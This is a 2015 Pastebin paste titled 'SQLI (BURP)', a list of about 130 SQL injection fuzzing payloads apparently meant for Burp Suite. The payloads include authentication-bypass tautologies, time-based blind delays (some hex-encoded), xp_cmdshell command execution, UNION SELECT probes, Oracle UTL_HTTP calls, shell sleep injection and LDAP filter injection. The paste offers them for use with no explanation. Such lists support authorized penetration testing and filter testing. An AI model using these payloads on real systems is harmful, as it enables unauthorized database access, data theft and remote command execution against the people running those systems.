API tools faq
paste
Advertisement
fahim420

SQLI (BURP)

fahim420
Jun 27th, 2015
74
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.18 KB | None | 0 0
raw download clone embed print report
  1. '
  2. a' or 1=1--
  3. "a"" or 1=1--"
  4. or a = a
  5. a' or 'a' = 'a
  6. 1 or 1=1
  7. a' waitfor delay '0:0:10'--
  8. 1 waitfor delay '0:0:10'--
  9. declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
  10. declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
  11. declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
  12. declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
  13. a'
  14. ?
  15. ' or 1=1
  16. ? or 1=1 --
  17. x' AND userid IS NULL; --
  18. x' AND email IS NULL; --
  19. anything' OR 'x'='x
  20. x' AND 1=(SELECT COUNT(*) FROM tabname); --
  21. x' AND members.email IS NULL; --
  22. x' OR full_name LIKE '%Bob%
  23. 23 OR 1=1
  24. '; exec master..xp_cmdshell 'ping 172.10.1.255'--
  25. '
  26. '%20or%20''='
  27. '%20or%20'x'='x
  28. %20or%20x=x
  29. ')%20or%20('x'='x
  30. 0 or 1=1
  31. ' or 0=0 --
  32. " or 0=0 --
  33. or 0=0 --
  34. ' or 0=0 #
  35. or 0=0 #"
  36. or 0=0 #
  37. ' or 1=1--
  38. " or 1=1--
  39. ' or '1'='1'--
  40. ' or 1 --'
  41. or 1=1--
  42. or%201=1
  43. or%201=1 --
  44. ' or 1=1 or ''='
  45. or 1=1 or ""=
  46. ' or a=a--
  47. or a=a
  48. ') or ('a'='a
  49. ) or (a=a
  50. hi or a=a
  51. hi or 1=1 --"
  52. hi' or 1=1 --
  53. hi' or 'a'='a
  54. hi') or ('a'='a
  55. "hi"") or (""a""=""a"
  56. 'hi' or 'x'='x';
  57. @variable
  58. ,@variable
  59. PRINT
  60. PRINT @@variable
  61. select
  62. insert
  63. as
  64. or
  65. procedure
  66. limit
  67. order by
  68. asc
  69. desc
  70. delete
  71. update
  72. distinct
  73. having
  74. truncate
  75. replace
  76. like
  77. handler
  78. bfilename
  79. ' or username like '%
  80. ' or uname like '%
  81. ' or userid like '%
  82. ' or uid like '%
  83. ' or user like '%
  84. exec xp
  85. exec sp
  86. '; exec master..xp_cmdshell
  87. '; exec xp_regread
  88. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  89. --sp_password
  90. \x27UNION SELECT
  91. ' UNION SELECT
  92. ' UNION ALL SELECT
  93. ' or (EXISTS)
  94. ' (select top 1
  95. '||UTL_HTTP.REQUEST
  96. 1;SELECT%20*
  97. to_timestamp_tz
  98. tz_offset
  99. <>"'%;)(&+
  100. '%20or%201=1
  101. %27%20or%201=1
  102. %20$(sleep%2050)
  103. %20'sleep%2050'
  104. char%4039%41%2b%40SELECT
  105. '%20OR
  106. 'sqlattempt1
  107. (sqlattempt2)
  108. |
  109. %7C
  110. *|
  111. %2A%7C
  112. *(|(mail=*))
  113. %2A%28%7C%28mail%3D%2A%29%29
  114. *(|(objectclass=*))
  115. %2A%28%7C%28objectclass%3D%2A%29%29
  116. (
  117. %28
  118. )
  119. %29
  120. &
  121. %26
  122. !
  123. %21
  124. ' or 1=1 or ''='
  125. ' or ''='
  126. x' or 1=1 or 'x'='y
  127. /
  128. //
  129. //*
  130. */*
  131. a' or 3=3--
  132. "a"" or 3=3--"
  133. ' or 3=3
  134. ? or 3=3 --
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!